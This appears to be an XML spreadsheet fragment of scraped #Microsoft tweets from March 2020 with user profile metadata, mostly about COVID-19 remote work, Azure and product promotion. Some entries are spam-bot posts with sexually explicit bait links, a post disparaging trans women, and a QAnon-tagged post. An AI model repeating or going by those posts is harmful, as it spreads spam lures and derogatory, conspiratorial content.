    <t>{'id': 3171641498, 'id_str': '3171641498', 'name': 'Kalinga TV', 'screen_name': 'Kalingatv', 'location': 'Odisha, India', 'description': 'When it comes to Breaking News, Kalinga TV leads the Way with 24x7 Coverage.', 'url': 'https://t.co/lrXWPUyDYx', 'entities': {'url': {'urls': [{'url': 'https://t.co/lrXWPUyDYx', 'expanded_url': 'http://kalingatv.com', 'display_url': 'kalingatv.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 35184, 'friends_count': 192, 'listed_count': 65, 'created_at': 'Sat Apr 25 04:37:23 +0000 2015', 'favourites_count': 454, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 58918,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'http://pbs.twimg.com/profile_images/1032290581043732480/JnVinurZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1032290581043732480/JnVinurZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3171641498/1583318032',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</si>
  <si>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06:03:51 +0000 2020</t>
  </si>
  <si>
    <t>@jwolpert @Sjaaaakster @baselineproto $UBT $LINK $ETH #baselineprotocol #EY #Microsoft #watchthisspace</t>
  </si>
  <si>
    <t>Thu Mar 05 06:02:49 +0000 2020</t>
  </si>
  <si>
    <t>Hey #Microsoft, instead of releasing an new version of Office every year/quarter with obscure features nobody needs, why don't you give us simple .net core library (without dependencies) for reading/writing office docs? Why do I have to pay 3rd parties 500 bucks for this?</t>
  </si>
  <si>
    <t>{'id': 544931166, 'id_str': '544931166', 'name': 'Rasel Jabbar', 'screen_name': 'Rasel_Jabbar', 'location': 'Sydney, New South Wales', 'description': "Made in New Zealand and baked in Australia from imported ingredients. I don't know what I am doing, don't follow me.", 'url': 'https://t.co/0PGZopNe2c', 'entities': {'url': {'urls': [{'url': 'https://t.co/0PGZopNe2c', 'expanded_url': 'http://jabbar.com.au/', 'display_url': 'jabbar.com.au', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 559, 'friends_count': 2148, 'listed_count': 55, 'created_at': 'Wed Apr 04 04:53:30 +0000 2012', 'favourites_count': 2760, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3268,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'http://pbs.twimg.com/profile_images/897447939114541056/LEz4jVBu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/897447939114541056/LEz4jVBu_normal.jpg',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</si>
  <si>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06:00:23 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> New Podcast! "S3EVII: FFVII Remake &amp;amp; Google Won't Pay Developers/Publishers (Oh, Also Ryan Came Back From Being Kidnapped)" on @Spreaker #amazon #apple #comedy #corona #game #games #genies #google #microsoft #nintendo #podcast #sony #video https://t.co/jkWgidl8n1</t>
  </si>
  <si>
    <t>{'id': 983445621918007296, 'id_str': '983445621918007296', 'name': 'Game Genies ðŸŽ™ï¸ Podcast', 'screen_name': 'GameGeniesCast', 'location': '', 'description': 'â™¦ï¸Season 3â™¦ï¸Comedy &amp; Video Games â™¦ï¸ ðŸ§”ðŸ½ðŸ§”ðŸ» ðŸ”ŠðŸ”ž iTunes, Spotify, Stitcher... Every Thursday Hosts: @WestTexasHell @freddysghetti', 'url': 'https://t.co/ffIIs3hJqs', 'entities': {'url': {'urls': [{'url': 'https://t.co/ffIIs3hJqs', 'expanded_url': 'http://linktr.ee/gamegeniescast', 'display_url': 'linktr.ee/gamegeniescast', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 403, 'friends_count': 407, 'listed_count': 0, 'created_at': 'Mon Apr 09 20:44:42 +0000 2018', 'favourites_count': 2016, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1038,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'http://pbs.twimg.com/profile_images/1084337745382772736/lSO116y9_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1084337745382772736/lSO116y9_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/983445621918007296/1579398357', 'profile_link_color': '37214D',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</si>
  <si>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06:00:21 +0000 2020</t>
  </si>
  <si>
    <t>Coronavirus outbreak: Microsoft allows employees to work from home
#LatestNews #Coronavirus #Microsoft 
https://t.co/iBoTdgy7qC</t>
  </si>
  <si>
    <t>{'id': 3227904038, 'id_str': '3227904038', 'name': 'Pragativadi', 'screen_name': 'PragativadiNews', 'location': 'Bhubaneswar, India', 'description': 'The only unbiased Odia Daily, Founded by Shri Pradyumn Kishore Bal.', 'url': 'https://t.co/2Sb6UznGST', 'entities': {'url': {'urls': [{'url': 'https://t.co/2Sb6UznGST', 'expanded_url': 'http://www.pragativadi.com/', 'display_url': 'pragativadi.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5958, 'friends_count': 230, 'listed_count': 8, 'created_at': 'Wed May 27 05:34:06 +0000 2015', 'favourites_count': 117, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 42177,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'http://pbs.twimg.com/profile_images/604187231062904832/oav5-YWG_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/604187231062904832/oav5-YWG_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3227904038/1455094600',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</si>
  <si>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05:59:48 +0000 2020</t>
  </si>
  <si>
    <t>I do not know pkoi I have cravings exhib today #Wisconsin   #microsoft #skype https://t.co/Rx3J52mKyx</t>
  </si>
  <si>
    <t>{'id': 1235336575468408833, 'id_str': '1235336575468408833', 'name': 'Tiffany Green', 'screen_name': 'compsatopvi', 'location': 'Tulsa, USA', 'description': 'It is not a lack of love, but a lack of friendship that makes unhappy marriages', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 19, 'listed_count': 0, 'created_at': 'Wed Mar 04 22:49:32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'http://pbs.twimg.com/profile_images/1235340299146326016/vsba5JYt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235340299146326016/vsba5JYt_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235336575468408833/1583363095',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</si>
  <si>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05:58:08 +0000 2020</t>
  </si>
  <si>
    <t>aelf is the very first cross-chain interoperable blockchain available on Azure and AWS. What does this mean for aelf?
@Microsoft @Amazon
#aelf #aelfblockchain #blockchain #cloud #Microsoft #Azure #AWS #ELF $ELF #crypto #cryptocurrency #aelftech https://t.co/5y3ly96pIg</t>
  </si>
  <si>
    <t>{'id': 903565929719541760, 'id_str': '903565929719541760', 'name': 'Ã¦lf', 'screen_name': 'aelfblockchain', 'location': 'Singapore', 'description': 'Ã¦lf blockchain, a decentralized cloud computing blockchain platform\nhttps://t.co/32TQ6Vv5TS', 'url': 'https://t.co/PekX0jwiwQ', 'entities': {'url': {'urls': [{'url': 'https://t.co/PekX0jwiwQ', 'expanded_url': 'http://aelf.io/', 'display_url': 'aelf.io', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/32TQ6Vv5TS', 'expanded_url': 'https://t.me/aelfblockchain', 'display_url': 't.me/aelfblockchain', 'indices': [68, 91]}]}}, 'protected': False, 'followers_count': 36472, 'friends_count': 190, 'listed_count': 786, 'created_at': 'Fri Sep 01 10:31:19 +0000 2017', 'favourites_count': 1423, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1447,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'http://pbs.twimg.com/profile_images/933992260680552448/tkxR4vpn_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/933992260680552448/tkxR4vpn_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/903565929719541760/1581132912',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</si>
  <si>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05:57:49 +0000 2020</t>
  </si>
  <si>
    <t>After #Microsoft forced a security update on us - breaking all @Docker images - I had to rebuild them yesterday. The #VS2017 image took over an hour with multiple retries. It is still broken.</t>
  </si>
  <si>
    <t>{'id': 24507292, 'id_str': '24507292', 'name': 'Gerry WeiÃŸbach', 'screen_name': 'gammaproduction', 'location': 'Hennigsdorf bei Berlin', 'description': 'Web, Docker, Video. Kids, House. Cyclists.', 'url': 'https://t.co/GOeprr6ZB0', 'entities': {'url': {'urls': [{'url': 'https://t.co/GOeprr6ZB0', 'expanded_url': 'http://www.gammaproduction.de', 'display_url': 'gammaproduction.de', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 153, 'friends_count': 556, 'listed_count': 16, 'created_at': 'Sun Mar 15 10:04:13 +0000 2009', 'favourites_count': 2271, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5865, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '1B304A', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/935417673722335232/YJGRBq1t_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/935417673722335232/YJGRBq1t_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/24507292/1376660269', 'profile_link_color': '1F1F30', 'profile_sidebar_border_color': '839EB3', 'profile_sidebar_fill_color': '1D5991', 'profile_text_color': 'E8E2D5', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 05:56:56 +0000 2020</t>
  </si>
  <si>
    <t>#Coronavirus : #Apple, #Microsoft, #Google look to move China production https://t.co/8RKG19k9sm</t>
  </si>
  <si>
    <t>{'id': 1135182793, 'id_str': '1135182793', 'name': 'Drop Dead Virusâœª', 'screen_name': 'DropDeadVirus', 'location': '', 'description': '#Covid19 Novel Coronavirus Updates', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 102, 'friends_count': 196, 'listed_count': 0, 'created_at': 'Wed Jan 30 20:51:21 +0000 2013', 'favourites_count': 5472, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1548,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'http://pbs.twimg.com/profile_images/1226090507513798657/hIm3rYrx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1226090507513798657/hIm3rYrx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1135182793/1581157646',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</si>
  <si>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Thu Mar 05 05:56:55 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft (
@Microsoft
) has allowed employees in #Seattle and #SanFrancisco to work from home till March 25 as the #novelcoronavirus outbreak continues to spread in the #US. 
#WuhanCoronavirus #CoronavirusOutbreak #Coronavirus
#COVID19</t>
  </si>
  <si>
    <t>{'id': 88380827, 'id_str': '88380827', 'name': 'ThePriteshRathod ðŸ‡®ðŸ‡³', 'screen_name': 'prathod2008', 'location': 'WorldWide', 'description': 'Love to share everythingâ€™s that help peoples ..#Bollywood , #Hollywood ,#Social work, #Blooddonor #TECH ,#Share #Market Make friends #Sports, #Books', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1320, 'friends_count': 709, 'listed_count': 418, 'created_at': 'Sun Nov 08 08:42:17 +0000 2009', 'favourites_count': 757, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 88274,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'http://pbs.twimg.com/profile_images/617020840085839873/azMoBZRc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/617020840085839873/azMoBZRc_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/88380827/1521108186',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</si>
  <si>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05:55:40 +0000 2020</t>
  </si>
  <si>
    <t>"#Microsoft, #Cisco #Integrate Their #Cloud and #IoT #Services: a 'seamless integration' of the two companies' #InternetofThings (IoT) and #cloudproducts, enabling more #edgecomputing scenarios. https://t.co/m7gYk9HZfY</t>
  </si>
  <si>
    <t>{'id': 7950992, 'id_str': '7950992', 'name': 'ð†ðžð«ð«ð¢ð­ ð„ð¢ðœð¤ðžð« ðŸ‘¨\u200dðŸ”¬ðŸ‘¨\u200dðŸš€ðŸ‘¨\u200dðŸš’', 'screen_name': 'eicker', 'location': 'MÃ¼nster', 'description': 'Entrepreneur, Explorer, Consultant @eickerdigital: Communications and Media since 1994. - @eickerTV ðŸ“º https://t.co/P7w6gRM4XE ðŸŽ™ https://t.co/aq1ufDwr6Câº', 'url': 'https://t.co/Np4VfqP1Ds', 'entities': {'url': {'urls': [{'url': 'https://t.co/Np4VfqP1Ds', 'expanded_url': 'https://eicker.digital/', 'display_url': 'eicker.digital', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/P7w6gRM4XE', 'expanded_url': 'http://Frisch-aus-dem-Netz.de', 'display_url': 'Frisch-aus-dem-Netz.de', 'indices': [102, 125]}, {'url': 'https://t.co/aq1ufDwr6C', 'expanded_url': 'http://eicker.media', 'display_url': 'eicker.media', 'indices': [128, 151]}]}}, 'protected': False, 'followers_count': 846, 'friends_count': 153, 'listed_count': 299, 'created_at': 'Sat Aug 04 08:41:22 +0000 2007', 'favourites_count': 2935, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 15546,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'http://pbs.twimg.com/profile_images/974610700604669952/B4DZmZzw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/974610700604669952/B4DZmZzw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/7950992/1577947314', 'profile_link_color': '990000', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '555555', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 05:54:38 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft asks staff in Seattle area, Silicon Valley to work from home https://t.co/3OYx7F1L68 #Microsoft</t>
  </si>
  <si>
    <t>{'id': 102005782, 'id_str': '102005782', 'name': 'Louw FouchÃ©', 'screen_name': 'LouwFouche', 'location': '', 'description': 'Innovator. Data Fanatic. Architect. Father. Hunter.\nAll views expressed are my own.', 'url': 'https://t.co/iJUvmSzNaQ', 'entities': {'url': {'urls': [{'url': 'https://t.co/iJUvmSzNaQ', 'expanded_url': 'http://za.linkedin.com/in/louwfouche', 'display_url': 'za.linkedin.com/in/louwfouche', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 71, 'friends_count': 255, 'listed_count': 4, 'created_at': 'Tue Jan 05 08:43:39 +0000 2010', 'favourites_count': 67, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 433,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'http://pbs.twimg.com/profile_images/1110991210368434177/vF6K9jfd_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1110991210368434177/vF6K9jfd_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/102005782/1553716317', 'profile_link_color': '95C2CF',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</si>
  <si>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05:54:14 +0000 2020</t>
  </si>
  <si>
    <t>#covid19 aka #coronavirus is impacting the live of many. #schools are moving to provide #remote #learning. Join our #Microsoft team #tomorrow on a #webinar to know more about it.
 #microsoftteams #microsoft365 #office365 #teachers...https://t.co/rjP0cKwn9q https://t.co/v1Kj6zx3NE</t>
  </si>
  <si>
    <t>Thu Mar 05 05:54:02 +0000 2020</t>
  </si>
  <si>
    <t>When I hear you scream and groan, when you cum, I feel so cool!
https://t.co/8nG6GUbPGN
#Oklahoma City
 #microsoft #applemusic https://t.co/c1jUHguxjK</t>
  </si>
  <si>
    <t>{'id': 1234502404244156419, 'id_str': '1234502404244156419', 'name': 'Brittany Ward', 'screen_name': 'credsuipotde', 'location': 'West Valley City, USA', 'description': 'One who marries for love alone will have bad days but good nights', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 14, 'listed_count': 0, 'created_at': 'Mon Mar 02 15:34:49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'http://pbs.twimg.com/profile_images/1234507265761300481/526PnRTH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234507265761300481/526PnRTH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234502404244156419/1583164515',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</si>
  <si>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05:52:55 +0000 2020</t>
  </si>
  <si>
    <t>Male feminists and trans feminists (male to female) are the "Open at Microsoft" of the women's rights movement. No, #microsoft doesn't speak for "Open", it is actively derailing it. They try to make it impermissible to even say this.</t>
  </si>
  <si>
    <t>Thu Mar 05 05:52:43 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Announcing preview of Azure Backup Reports https://t.co/uPnf87GFMd #Azure #AzureBackup #AzOps #DevOps #reporting via @AzureBackup Team https://t.co/r7CSRosHJ2</t>
  </si>
  <si>
    <t>Thu Mar 05 05:50:43 +0000 2020</t>
  </si>
  <si>
    <t>Why did Microsoft tap this German exchange for cloud peering?
#AzurePeeringService #Microsoft
Source: https://t.co/hBOjU0p8mB
By https://t.co/FEmp3sijJF</t>
  </si>
  <si>
    <t>Thu Mar 05 05:50:38 +0000 2020</t>
  </si>
  <si>
    <t>1 new repository created in Microsoft
- 1 Manageability_MAMA
 #GitHub #OpenSource #microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 05:42:14 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Remote Desktop App for Android available for Download (Preview) Early Access
 #Microsoft #MicrosoftRemoteDesktop #AndroidApp #Android #App https://t.co/fhDY24EKg7 via @thegeekermag @ALumia_Italia https://t.co/EiRAplcS4N</t>
  </si>
  <si>
    <t>{'id': 883587836389097472, 'id_str': '883587836389097472', 'name': 'GeekerMag', 'screen_name': 'thegeekermag', 'location': 'Kangra, India', 'description': 'The online magazine for Geeks. Follow us on telegram https://t.co/2of9WQyZv3', 'url': 'https://t.co/C2RD5LLXh2', 'entities': {'url': {'urls': [{'url': 'https://t.co/C2RD5LLXh2', 'expanded_url': 'https://geekermag.com', 'display_url': 'geekermag.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/2of9WQyZv3', 'expanded_url': 'https://t.me/geekermag', 'display_url': 't.me/geekermag', 'indices': [53, 76]}]}}, 'protected': False, 'followers_count': 54, 'friends_count': 43, 'listed_count': 1, 'created_at': 'Sat Jul 08 07:25:31 +0000 2017', 'favourites_count': 271, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 635,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'http://pbs.twimg.com/profile_images/1112277931466911744/NADy11qu_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1112277931466911744/NADy11qu_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/883587836389097472/1554143570',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</si>
  <si>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05:41:05 +0000 2020</t>
  </si>
  <si>
    <t>This is what is promoted by companies like Microsoft that distributes the most Operating Systems on the planet ...
.
.
#QAnon #Trump2020 #8kun #trump #qanonworldwide #liberals #liberalism #Democrats2020 #dnc
#corporatesocialresponsibility 
#thesepeoplearesick
 #Microsoft https://t.co/9TOiLOsKBs</t>
  </si>
  <si>
    <t>{'id': 1232876524853809152, 'id_str': '1232876524853809152', 'name': 'Noblesse.Wilde', 'screen_name': 'NoblesseWilde', 'location': '', 'description': 'Waiting for the awakening of those trapped in their minds ðŸï¸\nCheck Insta for that moment when you spin the top ðŸŒªï¸\n\nhttps://t.co/WRhuCFjMKU', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/WRhuCFjMKU', 'expanded_url': 'https://www.instagram.com/noblesse.wilde/', 'display_url': 'instagram.com/noblesse.wilde/', 'indices': [115, 138]}]}}, 'protected': False, 'followers_count': 8, 'friends_count': 19, 'listed_count': 0, 'created_at': 'Thu Feb 27 03:56:17 +0000 2020', 'favourites_count': 136, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 73, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1232879789507133440/xU5wBinx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1232879789507133440/xU5wBinx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1232876524853809152/1582815430',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</si>
  <si>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05:40:58 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/b6ncELjFnq
Which Is The Best 4K 10 Bit HDR Media Player For PC ?
https://t.co/75eu9KPNhk
https://t.co/U45RO5Je8g
https://t.co/6WgJC8gbAm
#iamintel #intel #windows10 #microsoft #android #mobile #ios #iphone #ipad #tablet #cnxplayer #app #hdr #10bit #4k #fullhd https://t.co/QN9OrgqdpM</t>
  </si>
  <si>
    <t>Thu Mar 05 05:39:28 +0000 2020</t>
  </si>
  <si>
    <t>MediSolz offers a comprehensive end to end healthcare solution that simplifies and streamlines clinic processes. Get a 7-day free trial: https://t.co/Iqhr4WsMaV
#healthcare #medisolz #doctor #patient #Microsoft #healthcareforall https://t.co/HvneAWBl2C</t>
  </si>
  <si>
    <t>{'id': 821949437987659776, 'id_str': '821949437987659776', 'name': 'MediSolz - Clinic Management Software', 'screen_name': 'medisolz_solz', 'location': 'Bhopal, India', 'description': 'Healthcare system that simplifies and streamlines hospital processes to improve patient experience at a clinic.', 'url': 'https://t.co/p0ofGnZVQd', 'entities': {'url': {'urls': [{'url': 'https://t.co/p0ofGnZVQd', 'expanded_url': 'https://www.solzit.com/medisolz/', 'display_url': 'solzit.com/medisolz/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 13, 'friends_count': 214, 'listed_count': 0, 'created_at': 'Thu Jan 19 05:16:31 +0000 2017', 'favourites_count': 2,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'http://pbs.twimg.com/profile_images/1234724738024345601/xZ1ULtuE_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234724738024345601/xZ1ULtuE_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/821949437987659776/1583216294',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</si>
  <si>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05:37:33 +0000 2020</t>
  </si>
  <si>
    <t>Microsofts TV white space proposal moves forward 
#WhiteSpace #Microsoft
Source: https://t.co/AUshr1bVSg
By https://t.co/FEmp3sijJF</t>
  </si>
  <si>
    <t>Thu Mar 05 05:37:15 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft, Google &amp;amp; LogMeIn Offer #Free Remote Work #Tools Due to Coronavirus.
#Microsoft "Teams" free for six months: https://t.co/yNLcvSlyUl
#Google offers free access to Hangouts Meet for G Suite users
#LogMeIn offers free Emergency Remote Work Kits: https://t.co/U2BtjAzLCc</t>
  </si>
  <si>
    <t>{'id': 89471872, 'id_str': '89471872', 'name': 'Harshana Peiris', 'screen_name': 'emrhpeiris', 'location': 'Sri Lanka', 'description': 'Marketer, Creative, Constructive team leader with an eye on innovation and pixel perfections.', 'url': 'https://t.co/ebE3hLl38F', 'entities': {'url': {'urls': [{'url': 'https://t.co/ebE3hLl38F', 'expanded_url': 'http://harshana.me', 'display_url': 'harshana.me', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 160, 'friends_count': 211, 'listed_count': 45, 'created_at': 'Thu Nov 12 15:42:52 +0000 2009', 'favourites_count': 95, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2842,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'http://pbs.twimg.com/profile_images/1130272101561229317/BWdqhvWT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1130272101561229317/BWdqhvWT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/89471872/1428477759',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</si>
  <si>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05:37:12 +0000 2020</t>
  </si>
  <si>
    <t>MediSolz offers a comprehensive end to end healthcare solution that simplifies and streamlines clinic processes. Get a 7-day free trial: https://t.co/jEwh8UG0fV
#healthcare #medisolz #doctor #patient #Microsoft #healthcareforall https://t.co/9XQ0DWK6hU</t>
  </si>
  <si>
    <t>{'id': 2545375464, 'id_str': '2545375464', 'name': 'Soluzione IT Services', 'screen_name': 'soluzioneit', 'location': 'Bhopal, MP India', 'description': 'We are #Microsoft_Gold_Partner specialist in #MSDyn365CRM', 'url': 'https://t.co/l6EdbTpVDx', 'entities': {'url': {'urls': [{'url': 'https://t.co/l6EdbTpVDx', 'expanded_url': 'https://solzit.com', 'display_url': 'solzit.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 383, 'friends_count': 2192, 'listed_count': 4, 'created_at': 'Wed Jun 04 06:28:49 +0000 2014', 'favourites_count': 82, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 721,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'http://pbs.twimg.com/profile_images/1050002985722376194/RUtEJ5xO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1050002985722376194/RUtEJ5xO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2545375464/1484199216', 'profile_link_color': '2B5EB8',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</si>
  <si>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05:36:43 +0000 2020</t>
  </si>
  <si>
    <t>From home to business, from desktop to web and the devices in between, Office delivers the tools you need to create your best work.
Call for Best Dealer Prices: 9818046744
#Microsoft #Office365 #OfficeApplication #KarishmaComputers #NehruPlace https://t.co/rZs7mLI6Er</t>
  </si>
  <si>
    <t>{'id': 3375306226, 'id_str': '3375306226', 'name': 'Karishma Computers', 'screen_name': 'KarishmaTweet', 'location': 'New Delhi, Delhi', 'description': 'LEADING DISTRIBUTERS FOR EPSON, LOGITECH, FUJITSU, MICROSOFT IN DELHI NCR', 'url': 'http://t.co/xLsU3WYN7V', 'entities': {'url': {'urls': [{'url': 'http://t.co/xLsU3WYN7V', 'expanded_url': 'http://www.Karishma.in', 'display_url': 'Karishma.in', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 497, 'friends_count': 3864, 'listed_count': 0, 'created_at': 'Tue Jul 14 06:07:47 +0000 2015', 'favourites_count': 20, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 375,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'http://pbs.twimg.com/profile_images/1034675633887105025/I3y_LNUS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1034675633887105025/I3y_LNUS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3375306226/1580112343',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</si>
  <si>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05:36:41 +0000 2020</t>
  </si>
  <si>
    <t>@valueterminal @agamemnus_dev And, just imagine this quantum wealth, it isn't on par with Zuckerberg, Gates, Koch Brothers, or the Waltons. We reside in a world, that is in a truly inequitable age. 
#Facebook #Microsoft #KochIndustries #Walmart</t>
  </si>
  <si>
    <t>{'id': 1415149603, 'id_str': '1415149603', 'name': 'The Chronicles of Chris Young', 'screen_name': 'YoungChris27040', 'location': 'Disabled (with too many chromosomes) disease-ridden chronic illness &amp; surgery survivor. Vegetarian resides MEL Disclaimer: RTsâ‰ endorsement!', 'description': 'Lifelong aspiring academic. Badge of honour: â€œleft-wing anarchistâ€ â€” Trump. Dry Comedian, scribe: memoir TBD #IBD #Oncology #Neuroscience #Biochemistry #Biology', 'url': 'https://t.co/dqjnkRJUXC', 'entities': {'url': {'urls': [{'url': 'https://t.co/dqjnkRJUXC', 'expanded_url': 'https://m.facebook.com/home.php?soft=bookmarks', 'display_url': 'm.facebook.com/home.php?soft=â€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2051, 'friends_count': 4009, 'listed_count': 667, 'created_at': 'Thu May 09 10:06:24 +0000 2013', 'favourites_count': 30723, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 164434,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'http://pbs.twimg.com/profile_images/1126734555426185216/7F2_kIqW_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1126734555426185216/7F2_kIqW_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1415149603/1487341410',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</si>
  <si>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05:35:23 +0000 2020</t>
  </si>
  <si>
    <t>I can definitely understand why #Netlify is gaining popularity.  It's #AWS without the headaches, #Google App Engine without the privacy implications, and #Azure without the #Microsoft.</t>
  </si>
  <si>
    <t>{'id': 59501781, 'id_str': '59501781', 'name': 'Frank W. Zammetti', 'screen_name': 'fzammetti', 'location': 'Pennsyvania, U.S.A.', 'description': 'Published tech author, software architect, sci-fi novelist (https://t.co/qFKGAPitPK), game developer, musician, science nerd, sci-fi geek, all-around wiseguy', 'url': 'https://t.co/gFOQaoJ1cT', 'entities': {'url': {'urls': [{'url': 'https://t.co/gFOQaoJ1cT', 'expanded_url': 'http://www.zammetti.com', 'display_url': 'zammetti.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/qFKGAPitPK', 'expanded_url': 'http://theinfiniteuniversesaga.com', 'display_url': 'theinfiniteuniversesaga.com', 'indices': [60, 83]}]}}, 'protected': False, 'followers_count': 1043, 'friends_count': 650, 'listed_count': 92, 'created_at': 'Thu Jul 23 15:50:03 +0000 2009', 'favourites_count': 673, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 68860, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F25F72', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 